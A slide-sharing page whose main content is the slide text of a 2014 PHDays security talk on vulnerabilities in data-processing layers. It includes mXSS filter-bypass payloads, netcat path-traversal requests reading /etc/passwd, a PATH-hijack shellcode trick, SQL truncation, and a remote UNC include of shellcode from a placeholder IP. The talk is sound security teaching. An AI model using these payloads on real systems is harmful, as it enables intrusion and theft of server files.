Best Angular 17 Classroom & Online training - Naresh ITBest Angular 17 Classroom & Online training - Naresh IT
Best Angular 17 Classroom & Online training - Naresh ITmanoharjgpsolutions
 
Introduction to Firebase Workshop Slides
Introduction to Firebase Workshop SlidesIntroduction to Firebase Workshop Slides
Introduction to Firebase Workshop Slidesvaideheekore1
 
Large Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLarge Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLionel Briand
 
Effectively Troubleshoot 9 Types of OutOfMemoryError
Effectively Troubleshoot 9 Types of OutOfMemoryErrorEffectively Troubleshoot 9 Types of OutOfMemoryError
Effectively Troubleshoot 9 Types of OutOfMemoryErrorTier1 app
 
SAM Training Session - How to use EXCEL ?
SAM Training Session - How to use EXCEL ?SAM Training Session - How to use EXCEL ?
SAM Training Session - How to use EXCEL ?Alexandre Beguel
 
Strategies for using alternative queries to mitigate zero results
Strategies for using alternative queries to mitigate zero resultsStrategies for using alternative queries to mitigate zero results
Strategies for using alternative queries to mitigate zero resultsJean Silva
 
Machine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringMachine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringHironori Washizaki
 
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilitiesAmazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilitiesKrzysztofKkol1
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZABSYZ Inc
 
Leveraging AI for Mobile App Testing on Real Devices | Applitools + Kobiton
Leveraging AI for Mobile App Testing on Real Devices | Applitools + KobitonLeveraging AI for Mobile App Testing on Real Devices | Applitools + Kobiton
Leveraging AI for Mobile App Testing on Real Devices | Applitools + KobitonApplitools
 
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...OnePlan Solutions
 
Keeping your build tool updated in a multi repository world
Keeping your build tool updated in a multi repository worldKeeping your build tool updated in a multi repository world
Keeping your build tool updated in a multi repository worldRoberto Pérez Alcolea
 
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdfEnhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdfRTS corp
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxAndreas Kunz
 
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxThe Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxRTS corp
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsSafe Software
 
VictoriaMetrics Q1 Meet Up '24 - Community & News Update
VictoriaMetrics Q1 Meet Up '24 - Community & News UpdateVictoriaMetrics Q1 Meet Up '24 - Community & News Update
VictoriaMetrics Q1 Meet Up '24 - Community & News UpdateVictoriaMetrics
 

Último (20)

SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
 
Post Quantum Cryptography – The Impact on Identity
Post Quantum Cryptography – The Impact on IdentityPost Quantum Cryptography – The Impact on Identity
Post Quantum Cryptography – The Impact on Identity
 
Comparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdfComparing Linux OS Image Update Models - EOSS 2024.pdf
Comparing Linux OS Image Update Models - EOSS 2024.pdf
 
Best Angular 17 Classroom & Online training - Naresh IT
Best Angular 17 Classroom & Online training - Naresh ITBest Angular 17 Classroom & Online training - Naresh IT
Best Angular 17 Classroom & Online training - Naresh IT
 
Introduction to Firebase Workshop Slides
Introduction to Firebase Workshop SlidesIntroduction to Firebase Workshop Slides
Introduction to Firebase Workshop Slides
 
Large Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and RepairLarge Language Models for Test Case Evolution and Repair
Large Language Models for Test Case Evolution and Repair
 
Effectively Troubleshoot 9 Types of OutOfMemoryError
Effectively Troubleshoot 9 Types of OutOfMemoryErrorEffectively Troubleshoot 9 Types of OutOfMemoryError
Effectively Troubleshoot 9 Types of OutOfMemoryError
 
SAM Training Session - How to use EXCEL ?
SAM Training Session - How to use EXCEL ?SAM Training Session - How to use EXCEL ?
SAM Training Session - How to use EXCEL ?
 
Strategies for using alternative queries to mitigate zero results
Strategies for using alternative queries to mitigate zero resultsStrategies for using alternative queries to mitigate zero results
Strategies for using alternative queries to mitigate zero results
 
Machine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringMachine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their Engineering
 
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilitiesAmazon Bedrock in Action - presentation of the Bedrock's capabilities
Amazon Bedrock in Action - presentation of the Bedrock's capabilities
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZ
 
Leveraging AI for Mobile App Testing on Real Devices | Applitools + Kobiton
Leveraging AI for Mobile App Testing on Real Devices | Applitools + KobitonLeveraging AI for Mobile App Testing on Real Devices | Applitools + Kobiton
Leveraging AI for Mobile App Testing on Real Devices | Applitools + Kobiton
 
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...
Revolutionizing the Digital Transformation Office - Leveraging OnePlan’s AI a...
 
Keeping your build tool updated in a multi repository world
Keeping your build tool updated in a multi repository worldKeeping your build tool updated in a multi repository world
Keeping your build tool updated in a multi repository world
 
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdfEnhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
Enhancing Supply Chain Visibility with Cargo Cloud Solutions.pdf
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
 
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptxThe Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
The Role of IoT and Sensor Technology in Cargo Cloud Solutions.pptx
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data Streams
 
VictoriaMetrics Q1 Meet Up '24 - Community & News Update
VictoriaMetrics Q1 Meet Up '24 - Community & News UpdateVictoriaMetrics Q1 Meet Up '24 - Community & News Update
VictoriaMetrics Q1 Meet Up '24 - Community & News Update
 

Vulnerabilities in data processing layers across request handling

  • 1. Vulnerabilities in data processing layers Omar Ganiev PHDays 2014 Moscow
  • 2. whoami • Beched (ahack.ru, @ahack_ru) • Math student • RDot.Org (CTF) team • Penetration testing expert at IncSecurity
  • 3. Intro • Application’s behaviour is defined not only by its code, but also by a plenty of external factors such as environment • We’ll try to dig into different layers of data processing and point out the potential dangers which are often ignored by developers
  • 5. Real program • A lot of inputs • User supplied input • Operating system environment • Hardware • We‘ll talk about general situation and will pay specific attention to web applications
  • 6. Web application interaction Browser Web server Application
  • 7. Web application interaction Browser Web server Framework Database Application
  • 8. Request processing layers • Hardware • Operating system • Browser • Network • Web server • Framework • Application • Database • File system
  • 9. Request processing layers • In general case: Hardware OS Client Network Server
  • 10. Data processing • Each layer has some inputs and outputs • Each input and output is somehow processed, normalized, filtered, etc • Developers often consider only the user inputs, which are explicitly defined in the code • Other problem is that often output contains sensitive information which is used as an input for some functions
  • 11. Input/output trust • Which input can be trusted, and which one is user-controlled? • Which input is secret, and which one is contained in output? • This is not always clear • Let’s observe each abstract layer and look at input and output processing weaknesses
  • 12. Hardware layer • Input from pseudo devices /dev/random , /dev/urandom in Linux is not always safe, see http://www.blackhat.com/presentations/bh- usa-06/BH-US-06-Gutterman.pdf • Speed of system clock quartz crystals depends on the temperature. This creates a side channel (clock skew) for attacking anonymity systems: http://www.cl.cam.ac.uk/~sjm217/papers/ccs0 6hotornot.pdf • Cryptanalysis via various physical side channels
  • 13. Operating system layer • int main() { system(“id”); } • Safe? No! There’re no inputs in application, but there’re inputs in environment • PATH=.:$PATH • Put shellcode in ./id and run the executable • Real-world example: CVE-2013-1662, unsafe popen of lsb_release file in suid vmware- mount binary
  • 14. Operating system layer • External libraries provide another input point • This results in such attacks as DLL injection and hooking • CreateRemoteThread, SetWindowsHookEx, etc in Windows • LD_PRELOAD in Linux
  • 15. Browser layer • Browser makes a lot of transformations of the data • The purpose of transformation is standard compliance (like RFC, W3C) • The transformations are often done after input validation by web application • Breaking standards leads to various client-side attacks
  • 16. Browser layer • XSS, UI redressing, URL spoofing, HTTP response splitting, open redirects via the single HTTP parameter – Request-path: https://rdot.org/forum/showthread.php?t=25 96 (by @black2fan) • Browsers incorrectly treat Location response header and inject malicious data into Request- path
  • 17. Browser layer • Mutated XSS (mXSS) is an attack on the output • Browsers compile non-valid HTML pages into some canonical form • The transformations can be quite weird: https://cure53.de/fp170.pdf • More examples: <listing>&lt;img src=1 onerror=alert(1)&gt;</listing> <img src= alt=“ onerror=alert(1);//”> • Try at http://html5sec.org/innerhtml/
  • 18. Browser layer • All the checks and input validation are typically done on the server side • Hence, mXSS can bypass such checks and WAF • Consider signature-based filter (for example, in CMS Bitrix) • We can encode bad words in the following mXSS payload for IE: <listing>&lt;img src=1 o&#x6e;error=alert(1)&gt;</listing> • This is rendered into <img src=1 onerror=alert(1)> and bypasses WAF
  • 19. Network layer • TCP timestamps can reveal various information (see Hardware layer) • Network administrators often forget about internal recursive DNS servers, which makes it possible to transfer data in DNS tunnel, bypassing firewalls
  • 20. Web server layer • HTTP daemon should verify validity of the packets • Fields should meet RFC rules • But can one assume that this is the case and trust any HTTP header field? • No! Apache is a typical example of the software, which breaks the rules
  • 21. Web server layer • Let’s discover Apache magic $ echo a | nc localhost 80 • 400 error? Nope, the index page is loaded. Note this: ["SERVER_PROTOCOL"]=> string(8) "HTTP/0.9" ["REQUEST_METHOD"]=> string(1) "a" ["QUERY_STRING"]=> string(0) "" ["REQUEST_URI"]=> string(0) ""
  • 22. Web server layer • Often $_SERVER[‘REQUEST_URI’] is used in file inclusion, can we perform a path traversal (not in QUERY_STRING)? Example: <? $docroot = $_SERVER['DOCUMENT_ROOT']; $url = explode('?', $_SERVER['REQUEST_URI']); $path = substr($url[0], 1); $parts = explode('/', $path); if($parts[0] == 'assets') { readfile("$docroot/$path"); exit(); }
  • 23. Web server layer • Okay, let’s try: $ echo 'GET /../../../../../etc/passwd' | nc localhost 80 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>400 Bad Request</title>
  • 24. Web server layer • Here comes double-slash magic: $ echo -e 'GET xassets/../../..//etc/passwd' | nc localhost 80 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh … • Clearly, this should not work, but it works. You should not trust the web server data processing!
  • 25. Web server layer • Similar constructions are often used in MVC projects to parse the controller and action values. Example from the article in Xakep magazine (167): $piecesOfUrl = explode('/', $_SERVER['REQUEST_URI']); … $controllerName = $piecesOfUrl[1]; … include $fileWithControllerPath;
  • 26. Web server layer • Looks like secure, but what if someone launches this on the Windows box with Apache? • The following payload will then include myfile.php: GET a/................myfile/..// • There’re lots of such code snippets on GitHub (vulnerable to file inclusion via REQUEST_URI, not necessarily under Windows)
  • 27. Web server layer • The Host header is also untrustworthy, since the usage of $_SERVER[‘HTTP_HOST’] can lead to logical vulnerabilities • For instance, spoofing of the password restore link • See http://www.skeletonscribe.net/2013/05/pract ical-http-host-header-attacks.html
  • 28. Web server layer • This was all about input. What about output? • Web servers reveal current server time (Date header), static files’ modification time (Last- Modified header) • This can be used to predict the PRNG seed in PHP (using also PHPSESSID cookie value): http://habrahabr.ru/company/pt/blog/149746/
  • 29. Web server layer • Also consider the following code: function genid() { mt_srand(time()); $h = fopen('entropy', 'r'); $fstat = fstat($h); fclose($h); return md5(mt_rand() . $fstat[ 'atime' ] . $fstat[ 'mtime' ]); } • An id generated by such a function is insecure: an attacker can obtain mtime from Last-Modified header and atime -- by accessing ‘entropy’ file and reading Date header
  • 30. Framework layer • Do not always trust frameworks! Not every method is secure, read the source code and documentation • Insecure Ruby on Rails methods: http://rails- sqli.org/ • Rather popular Yii class with a lot of find*() methods without SQL injection protection: https://github.com/yiisoft/yii/blob/master/fra mework/db/ar/CActiveRecord.php
  • 31. Framework layer • Example of insecure data processing inside the framework CakePHP: http://www.securityfocus.com/archive/1/527974 /30/0/threaded • The data (PATH_INFO variable) is first validated and then decoded, thus it’s possible to bypass the check: /theme/Test1/%2e.//%2e.//%2e.//%2e.//%2e.// %2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//% 2e./etc/passwd
  • 32. Database layer • DBMS store data in the fields with particular format (VARCHAR, BLOB, TEXT, INT, etc) • Each format has its own limitations, thus, an input data is transformed – trimmed or truncated • SQL column truncation attack can lead to compromise of any user account in the system: INSERT INTO `users` VALUES (‘admin x’, ‘password’);
  • 33. Database layer • PHP function addslashes can be bypassed: http://shiflett.org/blog/2006/jan/addslashes- versus-mysql-real-escape-string • This is due to charset transformations, when MySQL connection uses multi-byte charsets like BIG5 or GBK
  • 34. File system layer • In PHP there’re a lot of weird file path normalization algorithms • FindFirstFile WinAPI method allows to pass wildcards instead of exact paths to include functions under Windows: https://rdot.org/forum/showthread.php?t=926 • For example, this will include C:boot.ini: include 'C:<oot"<<';
  • 35. File system layer • In old version of PHP: /etc/passwd///[x4096]///.php = /etc/passwd ; /etc/passwd///// = /etc/passwd • Open_basedir bypass via glob wrapper: http://ahack.ru/bugs/php-vulnerabilities- exploits.htm • The path glob://… is first considered as relative and then is converted into URL
  • 36. File system layer • Allow_url_include and allow_url_fopen bypass via UNC path: include '//IP/path/shellcode.txt'; • Security checks are performed before transformation into remote UNC path
  • 37. Outro • Interaction with program goes through different layers, and each layer has its own parameters and data processing rules • The rule: first formatting, then validation • Each variable, which is not explicitly set in the code, should be treated as a potential source of malicious data